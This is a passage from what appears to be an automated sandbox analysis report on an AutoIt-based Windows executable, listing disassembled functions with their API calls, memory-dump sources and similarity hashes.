                                                                                                                                                            • Part of subcall function 0014869D: __getptd_noexit.LIBCMT ref: 0014869E
                                                                                                                                                          • __lock.LIBCMT ref: 0014811F
                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0014813C
                                                                                                                                                          • _free.LIBCMT ref: 0014814F
                                                                                                                                                          • InterlockedIncrement.KERNEL32(0173E450), ref: 00148167
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2704283638-0
                                                                                                                                                          • Opcode ID: fcea58f799157f40652dd394a7f95722c1802fdbccf02fb036d199a42e4bd5d9
                                                                                                                                                          • Instruction ID: 053531625872756a687c67ec8d4172027550695b99f0542c26e44f523aa8b339
                                                                                                                                                          • Opcode Fuzzy Hash: fcea58f799157f40652dd394a7f95722c1802fdbccf02fb036d199a42e4bd5d9
                                                                                                                                                          • Instruction Fuzzy Hash: 95018C31902A21AFCB12AF65980A79DB760BF05B15F49011BF81567BB1CF346882CBD2
                                                                                                                                                          Function 00148724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __lock.LIBCMT ref: 00148768
                                                                                                                                                            • Part of subcall function 00148984: __mtinitlocknum.LIBCMT ref: 00148996
                                                                                                                                                            • Part of subcall function 00148984: RtlEnterCriticalSection.NTDLL(00140127), ref: 001489AF
                                                                                                                                                          • InterlockedIncrement.KERNEL32(DC840F00), ref: 00148775
                                                                                                                                                          • __lock.LIBCMT ref: 00148789
                                                                                                                                                          • ___addlocaleref.LIBCMT ref: 001487A7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1687444384-0
                                                                                                                                                          • Opcode ID: d54423af19e8254411b61643f10ca3ab3217b1a8be177963a3e19427011dc874
                                                                                                                                                          • Instruction ID: c9ec2bbfe1c600127e86b41c467afdea1d77ef5686c547e77446a922267f3a5f
                                                                                                                                                          • Opcode Fuzzy Hash: d54423af19e8254411b61643f10ca3ab3217b1a8be177963a3e19427011dc874
                                                                                                                                                          • Instruction Fuzzy Hash: 75015775411B00DFE760EFA5D90A75AB7E0AF60326F20890EE09A976A0CB70A680CB01
                                                                                                                                                          Function 0018E13E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 0018E14D
                                                                                                                                                          • _memset.LIBCMT ref: 0018E15C
                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001E3EE0,001E3F24), ref: 0018E18B
                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0018E19D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3277943733-0
                                                                                                                                                          • Opcode ID: b469c8112d5fe734c69d5d8cf1bc83e824abc69e5904364f6738ad15dca55080
                                                                                                                                                          • Instruction ID: a4d3a9db17b93b9d4752d0eaefa52c56c5e8e6944ffd86360f36dcb291defc53
                                                                                                                                                          • Opcode Fuzzy Hash: b469c8112d5fe734c69d5d8cf1bc83e824abc69e5904364f6738ad15dca55080
                                                                                                                                                          • Instruction Fuzzy Hash: E9F054F1940340BEE61057A6AC49F7B7AACDB0A754F000461FA14DA5A2D3B64E9086B5
                                                                                                                                                          Function 00169C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00169C7F
                                                                                                                                                            • Part of subcall function 0016AD14: _memset.LIBCMT ref: 0016AD49
                                                                                                                                                          • _memmove.LIBCMT ref: 00169CA2
                                                                                                                                                          • _memset.LIBCMT ref: 00169CAF
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00169CBF
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 48991266-0
                                                                                                                                                          • Opcode ID: f5751fbc23ff91f268d2e2399f08eae79b2fea116bc41d8d624d52f23290bac1
                                                                                                                                                          • Instruction ID: 7da70be059d22e229e15cc77667063596533904c59bf8906e4ff342dec2d9357
                                                                                                                                                          • Opcode Fuzzy Hash: f5751fbc23ff91f268d2e2399f08eae79b2fea116bc41d8d624d52f23290bac1
                                                                                                                                                          • Instruction Fuzzy Hash: 98F05476201000BBCF016F54EC85A49BB29EF55315F04C055FE099F227C735E851DBB5
                                                                                                                                                          Function 0018E83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0013B5EB
                                                                                                                                                            • Part of subcall function 0013B58B: SelectObject.GDI32(?,00000000), ref: 0013B5FA
                                                                                                                                                            • Part of subcall function 0013B58B: BeginPath.GDI32(?), ref: 0013B611
                                                                                                                                                            • Part of subcall function 0013B58B: SelectObject.GDI32(?,00000000), ref: 0013B63B
                                                                                                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0018E860
                                                                                                                                                          • LineTo.GDI32(00000000,?,?), ref: 0018E86D
                                                                                                                                                          • EndPath.GDI32(00000000), ref: 0018E87D
                                                                                                                                                          • StrokePath.GDI32(00000000), ref: 0018E88B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1539411459-0
                                                                                                                                                          • Opcode ID: ed877d419652aaf56579f877d191b0a342a2447dc2290a8a3b7283496f001fdd
                                                                                                                                                          • Instruction ID: ce52df5c0c8fea2986eeacdb5098721f0f31392452860b868b0b3e9643b35b78
                                                                                                                                                          • Opcode Fuzzy Hash: ed877d419652aaf56579f877d191b0a342a2447dc2290a8a3b7283496f001fdd
                                                                                                                                                          • Instruction Fuzzy Hash: 4FF0E231000669BBDB162F90BC0DFCE3F99AF07310F048100FE12248E187758692CF95
                                                                                                                                                          Function 0015D623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0015D640
                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0015D653
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0015D65A
                                                                                                                                                          • AttachThreadInput.USER32(00000000), ref: 0015D661
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2710830443-0
                                                                                                                                                          • Opcode ID: abb3d4119926578ab317ab070ebec38700c40a2e435b639c4f184be3a672627d
                                                                                                                                                          • Instruction ID: 0ab5f95814f4863064745a1ba71cacf370d0c518f73e7f2e9f069725862e5998
                                                                                                                                                          • Opcode Fuzzy Hash: abb3d4119926578ab317ab070ebec38700c40a2e435b639c4f184be3a672627d
                                                                                                                                                          • Instruction Fuzzy Hash: F9E06D71141628BADB201FA2FC0DEDB7F1DEF127A2F408010B91E89861CB71D5C5CBA0
                                                                                                                                                          Function 0013B0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSysColor.USER32(00000008), ref: 0013B0C5
                                                                                                                                                          • SetTextColor.GDI32(?,000000FF), ref: 0013B0CF
                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 0013B0E4
                                                                                                                                                          • GetStockObject.GDI32(00000005), ref: 0013B0EC
                                                                                                                                                          • GetWindowDC.USER32(?,00000000), ref: 0019ECFA
                                                                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0019ED07
                                                                                                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0019ED20
                                                                                                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0019ED39
                                                                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0019ED59
                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 0019ED64
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1946975507-0
                                                                                                                                                          • Opcode ID: 5ecfdd8f118efd371487eefdd96a78b7497cedecd44de4dbd593e0f900ec2302
                                                                                                                                                          • Instruction ID: ddff821d824cd588f3a8830469e187d25257af6aab5fe748bb0314bf1409f619
                                                                                                                                                          • Opcode Fuzzy Hash: 5ecfdd8f118efd371487eefdd96a78b7497cedecd44de4dbd593e0f900ec2302
                                                                                                                                                          • Instruction Fuzzy Hash: 6FE06D71500640AEEF215F74FC497883B61AB06335F048226F76A584E2C3724581DB11
                                                                                                                                                          Function 0019C0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2889604237-0
                                                                                                                                                          • Opcode ID: 8040c28232d695061ac952ffa4def56cbe58dd93b75d418de42edb3b38ef3697
                                                                                                                                                          • Instruction ID: 9fc57245139b0e7483c02becf2916d7df810aad624693f109459ce47975585a5
                                                                                                                                                          • Opcode Fuzzy Hash: 8040c28232d695061ac952ffa4def56cbe58dd93b75d418de42edb3b38ef3697
                                                                                                                                                          • Instruction Fuzzy Hash: 06E012B6900600EFDB006F70A848AA93BA9EB48360F16C405F88B8BA50DBB499818B40
                                                                                                                                                          Function 0019C0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2889604237-0
                                                                                                                                                          • Opcode ID: 5d7ac88238ae4dbf3e2f2dc67da305f66b99b28fe8ce569699bf6a9dc3a2fea3
                                                                                                                                                          • Instruction ID: c021add009dae85185e5c534f47a738b784baca84da0cbb59f5007a09e283151
                                                                                                                                                          • Opcode Fuzzy Hash: 5d7ac88238ae4dbf3e2f2dc67da305f66b99b28fe8ce569699bf6a9dc3a2fea3
                                                                                                                                                          • Instruction Fuzzy Hash: 86E046B1900600EFDB006F70EC486A93BE9EB4D360F12C405F94F8BA50DBB899818B00
                                                                                                                                                          Function 0015EAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 0015ECA0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ContainedObject
                                                                                                                                                          • String ID: AutoIt3GUI$Container
                                                                                                                                                          • API String ID: 3565006973-3941886329
                                                                                                                                                          • Opcode ID: 17f067e1e95352a375a4cb5c490bdb7f25ebb3590a85596bf659961232627cf2
                                                                                                                                                          • Instruction ID: 2ce1816bff48df089acc8dee2827682ea1b7e5cdf0a38984260dcced31b632a0
                                                                                                                                                          • Opcode Fuzzy Hash: 17f067e1e95352a375a4cb5c490bdb7f25ebb3590a85596bf659961232627cf2
                                                                                                                                                          • Instruction Fuzzy Hash: 539168B0A00701DFDB18CF64C884A6ABBF9BF49711B14846EED5ACF291DBB0E944CB50
                                                                                                                                                          Function 0016E704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00123BCF: _wcscpy.LIBCMT ref: 00123BF2
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                          • __wcsnicmp.LIBCMT ref: 0016E785
                                                                                                                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0016E84E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
